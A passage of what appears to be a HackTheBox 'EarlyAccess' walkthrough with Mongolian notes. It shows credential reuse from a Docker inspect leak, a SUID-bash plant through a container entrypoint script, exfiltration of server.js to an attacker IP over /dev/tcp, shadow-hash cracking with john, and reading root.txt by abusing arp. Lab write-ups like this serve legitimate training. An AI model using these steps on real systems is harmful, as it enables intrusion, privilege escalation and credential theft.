oDeviceReadIOps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceWriteIOps":null,"BlkioWeight":0,"BlkioWeightDevice":null,"CapAdd":["SYS_NICE"],"CapDrop":null,"Cgroup":"","CgroupParent":"","CgroupnsMode":"host","ConsoleSize":[0,0],"ContainerIDFile":"","CpuCount":0,"CpuPercent":0,"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpuShares":0,"CpusetCpus":"","CpusetMems":"","DeviceCgroupRules":null,"DeviceRequests":null,"Devices":null,"Dns":null,"DnsOptions":null,"DnsSearch":null,"ExtraHosts":null,"GroupAdd":null,"IOMaximumBandwidth":0,"IOMaximumIOps":0,"IpcMode":"private","Isolation":"","KernelMemory":0,"KernelMemoryTCP":0,"Links":null,"LogConfig":{"Config":{},"Type":"json-file"},"MaskedPaths":["/proc/asound","/proc/acpi","/proc/kcore","/proc/keys","/proc/latency_stats","/proc/timer_list","/proc/timer_stats","/proc/sched_debug","/proc/scsi","/sys/firmware"],"Memory":0,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":null,"NanoCpus":0,"NetworkMode":"app_nw","OomKillDisable":false,"OomScoreAdj":0,"PidMode":"","PidsLimit":null,"PortBindings":{},"Privileged":false,"PublishAllPorts":false,"ReadonlyPaths":["/proc/bus","/proc/fs","/proc/irq","/proc/sys","/proc/sysrq-trigger"],"ReadonlyRootfs":false,"RestartPolicy":{"MaximumRetryCount":0,"Name":"always"},"Runtime":"runc","SecurityOpt":null,"ShmSize":67108864,"UTSMode":"","Ulimits":null,"UsernsMode":"","VolumeDriver":"","VolumesFrom":[]},"HostnamePath":"/var/lib/docker/containers/115007ba36acc375f807e9886c33bba6a00015de95d90ac9b035cfcc9c65731c/hostname","HostsPath":"/var/lib/docker/containers/115007ba36acc375f807e9886c33bba6a00015de95d90ac9b035cfcc9c65731c/hosts","Id":"115007ba36acc375f807e9886c33bba6a00015de95d90ac9b035cfcc9c65731c","Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287","LogPath":"/var/lib/docker/containers/115007ba36acc375f807e9886c33bba6a00015de95d90ac9b035cfcc9c65731c/115007ba36acc375f807e9886c33bba6a00015de95d90ac9b035cfcc9c65731c-json.log","MountLabel":"","Mounts":[{"Destination":"/docker-entrypoint-initdb.d","Mode":"ro","Propagation":"rprivate","RW":false,"Source":"/root/app/scripts/init.d","Type":"bind"},{"Destination":"/var/lib/mysql","Driver":"local","Mode":"rw","Name":"app_vol_mysql","Propagation":"","RW":true,"Source":"/var/lib/docker/volumes/app_vol_mysql/_data","Type":"volume"}],"Name":"/mysql","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","Networks":{"app_nw":{"Aliases":["mysql","115007ba36ac"],"DriverOpts":null,"EndpointID":"ea7202f4ce57070b1b29b7480f7d0bbad1f518029bebddcf7066c9339a4866d4","Gateway":"172.18.0.1","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"IPAMConfig":{"IPv4Address":"172.18.0.100"},"IPAddress":"172.18.0.100","IPPrefixLen":16,"IPv6Gateway":"","Links":null,"MacAddress":"02:42:ac:12:00:64","NetworkID":"21b7766aaedbf7acb2aa0cdd5edb3c1dcb0ff7bd1862f0bdeba42dd32f9a4099"}},"Ports":{"3306/tcp":null,"33060/tcp":null},"SandboxID":"56a717b402996134816fc6d7cb403815dd7b824bb884a38266673a9b2118fe23","SandboxKey":"/var/run/docker/netns/56a717b40299","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"Path":"docker-entrypoint.sh","Platform":"linux","ProcessLabel":"","ResolvConfPath":"/var/lib/docker/containers/115007ba36acc375f807e9886c33bba6a00015de95d90ac9b035cfcc9c65731c/resolv.conf","RestartCount":0,"State":{"Dead":false,"Error":"","ExitCode":0,"FinishedAt":"0001-01-01T00:00:00Z","Health":{"FailingStreak":0,"Log":[{"End":"2022-01-09T13:28:34.216042885+01:00","ExitCode":0,"Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n","Start":"2022-01-09T13:28:34.08894847+01:00"},{"End":"2022-01-09T13:28:39.331741871+01:00","ExitCode":0,"Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n","Start":"2022-01-09T13:28:39.220545254+01:00"},{"End":"2022-01-09T13:28:44.454926842+01:00","ExitCode":0,"Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n","Start":"2022-01-09T13:28:44.335553383+01:00"},{"End":"2022-01-09T13:28:49.557133592+01:00","ExitCode":0,"Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n","Start":"2022-01-09T13:28:49.459147552+01:00"},{"End":"2022-01-09T13:28:54.665423536+01:00","ExitCode":0,"Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n","Start":"2022-01-09T13:28:54.561773859+01:00"}],"Status":"healthy"},"OOMKilled":false,"Paused":false,"Pid":1075,"Restarting":false,"Running":true,"StartedAt":"2022-01-07T08:12:16.00787012Z","Status":"running"}},"status":200}
"Env":["MYSQL_DATABASE=db","MYSQL_USER=drew","MYSQL_PASSWORD=drew","MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
ssh drew@10.10.11.110
password: XeoNu86JTznxMCQuGHrGutF3Csq5
user.txt
2d27000*********
5. Enumeration
ssh drew@10.10.11.110
password: XeoNu86JTznxMCQuGHrGutF3Csq5
sudo -l:
drew@earlyaccess:~$ sudo -l
-bash: sudo: command not found
logs:
[+] PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
New path exported: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/sbin:/usr/sbin:/sbin
/etc/passwd:
cat: /etc/passwod: No such file or directory
drew@earlyaccess:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
drew:x:1000:1000:drew:/home/drew:/bin/bash
game-adm:x:1001:1001::/home/game-adm:/bin/bash
[+] Networks and neighbours
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens160
10.10.10.0 0.0.0.0 255.255.254.0 U 0 0 0 ens160
172.17.0.0 0.0.0.0 255.255.0.0 U 0 0 0 docker0
172.18.0.0 0.0.0.0 255.255.0.0 U 0 0 0 br-21b7766aaedb
172.19.0.0 0.0.0.0 255.255.0.0 U 0 0 0 br-ffc3c4811c09
IP address HW type Flags HW address Mask Device
10.10.10.2 0x1 0x2 00:50:56:b9:09:33 * ens160
172.18.0.102 0x1 0x2 02:42:ac:12:00:66 * br-21b7766aaedb
172.19.0.4 0x1 0x2 02:42:ac:13:00:04 * br-ffc3c4811c09
172.18.0.2 0x1 0x2 02:42:ac:12:00:02 * br-21b7766aaedb
[+] Checking if containerd(ctr) is available
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
[+] Checking if runc is available
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it
[+] Searching docker files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket
srw-rw---- 1 root docker 0 Jan 7 09:12 /run/docker.sock
[+] Modified interesting files in the last 5mins (limit 100)
/var/log/lastlog
/var/log/apache2/access-ssl.log
/var/log/syslog
/var/log/messages
/var/log/daemon.log
/var/log/user.log
/var/log/auth.log
/var/log/wtmp
/home/drew/.gnupg/pubring.kbx
/home/drew/.gnupg/crls.d/DIR.txt
/home/drew/.gnupg/trustdb.gpg
/opt/docker-entrypoint.d/node-server.sh
[+] Mails (limit 50)
400314 4 -rw-r--r-- 1 root mail 678 Jul 14 12:26 /var/mail/drew
400314 4 -rw-r--r-- 1 root mail 678 Jul 14 12:26 /var/spool/mail/drew
cat /var/mail/drew:
To: <drew@earlyaccess.htb>
Subject: Game-server crash fixes
From: game-adm <game-adm@earlyaccess.htb>
Date: Thu May 27 8:10:34 2021
Hi Drew!
Thanks again for taking the time to test this very early version of our newest project!
We have received your feedback and implemented a healthcheck that will automatically restart the game-server if it has crashed (sorry for the current instability of the game! We are working on it...)
If the game hangs now, the server will restart and be available again after about a minute.
If you find any other problems, please don't hesitate to report them!
Thank you for your efforts!
Game-adm (and the entire EarlyAccess Studios team).
cat /var/spool/mail/drew:
To: <drew@earlyaccess.htb>
Subject: Game-server crash fixes
From: game-adm <game-adm@earlyaccess.htb>
Date: Thu May 27 8:10:34 2021
Hi Drew!
Thanks again for taking the time to test this very early version of our newest project!
We have received your feedback and implemented a healthcheck that will automatically restart the game-server if it has crashed (sorry for the current instability of the game! We are working on it...)
If the game hangs now, the server will restart and be available again after about a minute.
If you find any other problems, please don't hesitate to report them!
Thank you for your efforts!
Game-adm (and the entire EarlyAccess Studios team).
id_rsa.pub:
ssh-rsa AAAAB3NzaC1yc****************************************************7nvettGYr5lcS8w== game-tester@game-server
game-tester@game-server гэж байна.
uname -a:
Linux earlyaccess 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
Nmap binary: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap
Local VM:
python3 -m http.server
Machine VM:
cd /tmp
curl 10.10.14.12:8000/nmap -o nmap
chmod +x nmap
ip addr | grep 172
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-ca136e98e231
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-681dd3ec01e5
./nmap -oA output/ -n 172.19.0.1/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-02-15 07:18 CET
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.19.0.1
Host is up (0.00027s latency).
Not shown: 1204 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap scan report for 172.19.0.2
Host is up (0.00030s latency).
All 1207 scanned ports on 172.19.0.2 are closed
Nmap scan report for 172.19.0.3
Host is up (0.00032s latency).
Not shown: 1206 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.03 seconds
ssh game-tester@172.19.0.3
lntp:
ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.11:33699 *:*
LISTEN 0 128 *:9999 *:*
LISTEN 0 128 :::22 :::*
~C prefix key, ssh-руу:
-L 9999:172.19.0.3:9999
game-tester@game-server:/$ cat entrypoint.sh:
#!/bin/bash
for ep in /docker-entrypoint.d/*; do
if [ -x "${ep}" ]; then
echo "Running: ${ep}"
"${ep}" &
fi
done
tail -f /dev/null
drew буцах:
drew@earlyaccess:/opt/docker-entrypoint.d :
vi exec.sh
exec.sh
#!/bin/bash
chmod 4755 /bin/bash
game-tester дээр орж ирэхгүй байгаа.
drew mv:
loop:
while true; do
cp exec.sh /opt/docker-entrypoint.d/
done
bash test.sh
game-tester vm:
game-tester@game-server:~$ ls /docker-entrypoint.d/ │drew@earlyaccess:/tmp$ vi test.sh
exec.sh node-server.sh │drew@earlyaccess:/tmp$ bash test.sh
game-tester@game-server:~$
cat /docker-entrypoint.d/node-server.sh
find . | grep server.js
find . 2>/dev/null | grep server.js
game-tester@game-server:/usr/src/app/server.js
# Local VM
nc -lvnp 9001 > out
# Machine VM game-tester
cat server.js > /dev/tcp/10.10.14.12/9001
rounds=-1
сервер унвал:
game-tester@game-server:~$ Connection to 172.19.0.3 closed by remote host.
Connection to 172.19.0.3 closed.
./nmap -oA output/ -n 172.19.0.1/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-02-15 08:13 CET
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.19.0.1
Host is up (0.00026s latency).
Not shown: 1204 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap scan report for 172.19.0.2
Host is up (0.00029s latency).
All 1207 scanned ports on 172.19.0.2 are closed
Nmap scan report for 172.19.0.3
Host is up (0.00031s latency).
Not shown: 1206 closed ports
PORT STATE SERVICE
22/tcp open ssh
172.19.0.3
ssh game-tester@172.19.0.3
``
drew@earlyaccess:/tmp$ ssh game-tester@172.19.0.3
Linux game-server 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 15 07:09:11 2022 from 172.19.0.1
-bash-4.4$
bash -p
id
uid=1001(game-tester) gid=1001(game-tester) euid=0(root) groups=1001(game-tester)
cd /etc/
cat shadow
game-adm:$6$zbRQg.JO7dBWcZ$DWEKGCPIilhzWjJ/N0WRp.FNArirqqzEMeHTaA8DAJjPdu8h52v0UZncJD8Df.0ncf6X2mjKYnH19RfGRneWX/:18822:0:99999:7:::
vi hashes
# hash нэмнэ
$6$zbRQg.JO7dBWcZ$DWEKGCPIilhzWjJ/N0WRp.FNArirqqzEMeHTaA8DAJjPdu8h52v0UZncJD8Df.0ncf6X2mjKYnH19RfGRneWX/
# дараа нь:
john hashes --wordlist=/usr/share/wordlists/rockyou.txt
# result
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA384"
Use the "--format=HMAC-SHA384" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
gamemaster (?)
1g 0:00:00:25 DONE (2022-02-15 02:20) 0.03913g/s 526.0p/s 526.0c/s 526.0C/s handball..waiting
Use the "--show" option to display all of the cracked passwords reliably
Session completed
gamemaster
su - game-adm
# id
uid=1001(game-adm) gid=1001(game-adm) groups=1001(game-adm),4(adm)
# ./arp -an
? (172.19.0.4) at 02:42:ac:13:00:04 [ether] on br-af44398bdb65
? (10.10.10.2) at 00:50:56:b9:64:63 [ether] on ens160
? (172.18.0.2) at 02:42:ac:12:00:02 [ether] on br-2fa8dd3cbbb
cd /usr/sbin
/arp -v -f /root/root.txt
# root.txt
7096b*************